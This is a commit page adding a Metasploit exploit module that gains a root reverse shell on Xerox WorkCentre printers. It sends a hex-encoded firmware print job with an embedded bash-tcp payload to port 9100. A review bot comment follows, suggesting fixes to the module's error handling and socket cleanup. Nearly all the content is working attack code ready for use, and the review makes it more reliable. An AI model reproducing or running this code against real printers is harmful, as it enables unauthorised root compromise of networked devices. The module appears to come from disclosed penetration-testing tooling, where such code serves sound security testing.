
Commit 9021e4d

committed
Xerox Workcentre firmware injection exploit
1 parent 0d449cb commit 9021e4d


1 file changed

+114
-0
lines changed

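--- /dev/null
+++ b/<file-path-not-shown-on-page>
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = GoodRanking
+include Msf::Exploit::Remote::Tcp
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Xerox reverse shell',
+'Description' => %{This module will execute commands with root priviages on Xerox Workcentre.},
+'Author' =>
+[
+'Deral "Percentx" Heiland',
+'Pete "Bokojan" Arzamendi'
+],
+'References' =>
+[
+['BID', '52483'],
+['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
+['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
+],
+'Privileged' => true,
+'License' => MSF_LICENSE,
+'Payload' =>
+{
+'DisableNops' => true,
+'Space' => 512,
+'Compat' =>
+{
+'PayloadType' => 'cmd cmd_bash',
+'RequiredCmd' => 'generic bash-tcp'
+}
+},
+'Platform' => ['unix'],
+'Arch' => ARCH_CMD,
+'Targets' => [['Automatic', {}]],
+'DisclosureDate' => 'March 07 2012',
+'DefaultTarget' => 0))
+
+register_options(
+[
+Opt::RPORT(9100)
+], self.class)
+end
+
+def exploit
+print_status("Sending print job to #{rhost} ")
+firmcode = "\x25\x25\x58\x52\x58\x62\x65\x67\x69\x6E\x0A\x25\x25\x4F\x49\x44"
+firmcode << "\x5F\x41\x54\x54\x5F\x4A\x4F\x42\x5F\x54\x59\x50\x45\x20\x4F\x49"
+firmcode << "\x44\x5F\x56\x41\x4C\x5F\x4A\x4F\x42\x5F\x54\x59\x50\x45\x5F\x44"
+firmcode << "\x59\x4E\x41\x4D\x49\x43\x5F\x4C\x4F\x41\x44\x41\x42\x4C\x45\x5F"
+firmcode << "\x4D\x4F\x44\x55\x4C\x45\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54"
+firmcode << "\x5F\x4A\x4F\x42\x5F\x53\x43\x48\x45\x44\x55\x4C\x49\x4E\x47\x20"
+firmcode << "\x4F\x49\x44\x5F\x56\x41\x4C\x5F\x4A\x4F\x42\x5F\x53\x43\x48\x45"
+firmcode << "\x44\x55\x4C\x49\x4E\x47\x5F\x41\x46\x54\x45\x52\x5F\x43\x4F\x4D"
+firmcode << "\x50\x4C\x45\x54\x45\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F"
+firmcode << "\x4A\x4F\x42\x5F\x43\x4F\x4D\x4D\x45\x4E\x54\x20\x22\x50\x72\x61"
+firmcode << "\x65\x64\x61\x50\x57\x4E\x32\x30\x31\x34\x3A"
+firmcode << "#{payload.encoded}\x3A"
+firmcode << "\x22\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F\x4A\x4F\x42\x5F"
+firmcode << "\x43\x4F\x4D\x4D\x45\x4E\x54\x20\x22\x70\x61\x74\x63\x68\x20\x54"
+firmcode << "\x68\x75\x20\x4F\x63\x74\x20\x32\x33\x20\x31\x39\x3A\x31\x34\x3A"
+firmcode << "\x32\x34\x20\x45\x44\x54\x20\x32\x30\x31\x34\x22\x0A\x25\x25\x4F"
+firmcode << "\x49\x44\x5F\x41\x54\x54\x5F\x44\x4C\x4D\x5F\x4E\x41\x4D\x45\x20"
+firmcode << "\x22\x78\x65\x72\x6F\x78\x22\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54"
+firmcode << "\x54\x5F\x44\x4C\x4D\x5F\x56\x45\x52\x53\x49\x4F\x4E\x20\x22\x4E"
+firmcode << "\x4F\x5F\x44\x4C\x4D\x5F\x56\x45\x52\x53\x49\x4F\x4E\x5F\x43\x48"
+firmcode << "\x45\x43\x4B\x22\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F\x44"
+firmcode << "\x4C\x4D\x5F\x53\x49\x47\x4E\x41\x54\x55\x52\x45\x20\x22\x63\x61"
+firmcode << "\x33\x36\x31\x30\x34\x37\x64\x61\x35\x36\x64\x62\x39\x64\x64\x38"
+firmcode << "\x31\x66\x65\x65\x36\x61\x32\x33\x66\x66\x38\x37\x35\x66\x61\x63"
+firmcode << "\x63\x33\x64\x66\x30\x65\x31\x31\x35\x33\x64\x33\x32\x35\x63\x32"
+firmcode << "\x64\x32\x31\x37\x63\x30\x65\x37\x35\x66\x38\x36\x31\x62\x22\x0A"
+firmcode << "\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F\x44\x4C\x4D\x5F\x45\x58"
+firmcode << "\x54\x52\x41\x43\x54\x49\x4F\x4E\x5F\x43\x52\x49\x54\x45\x52\x49"
+firmcode << "\x41\x20\x22\x65\x78\x74\x72\x61\x63\x74\x20\x2F\x74\x6D\x70\x2F"
+firmcode << "\x78\x65\x72\x6F\x78\x2E\x64\x6E\x6C\x64\x22\x0A\x25\x25\x58\x52"
+firmcode << "\x58\x65\x6E\x64\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
+firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
+firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
+firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
+firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
+firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
+firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
+firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
+firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
+firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
+firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
+firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
+firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
+firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
+firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
+firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
+firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
+firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
+firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
+firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
+
+begin
+connect(true, 'RPORT' => datastore['RPORT'].to_i)
+sock.put(firmcode)
+handler
+disconnect
+rescue
+print_error("Error connecting to #{rhost}")
+return
+end
+end
+end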
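Review bot: In `exploit` (file lines 104–112) the bare `rescue` reports every failure as "Error connecting to #{rhost}" and skips `disconnect`, so an exception raised by `sock.put` or `handler` after the connection is up leaves the socket open and is misattributed to the connect step. Moving `disconnect` into an `ensure` and rescuing only the connection error class instead of all of `StandardError` releases the socket on every path and lets unrelated errors surface with their real message; the trailing `return` inside the rescue is redundant either way. As far as I recall the Tcp mixin's `disconnect` tolerates a nil socket when `connect` itself failed, but that is worth confirming before relying on the `ensure`. Separately, the user-visible description on file line 15 misspells "privileges" as `priviages`, and `require 'msf/core'` with a `Metasploit3` class name is the legacy module header rather than the current `MetasploitModule` form. The whole of `exploit` lies inside this hunk.
```ruby
# … unchanged: firmcode assembly …
begin
  connect(true, 'RPORT' => datastore['RPORT'].to_i)
  sock.put(firmcode)
  handler
rescue ::Rex::ConnectionError => e
  print_error("Error connecting to #{rhost}: #{e.message}")
ensure
  disconnect
end
```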
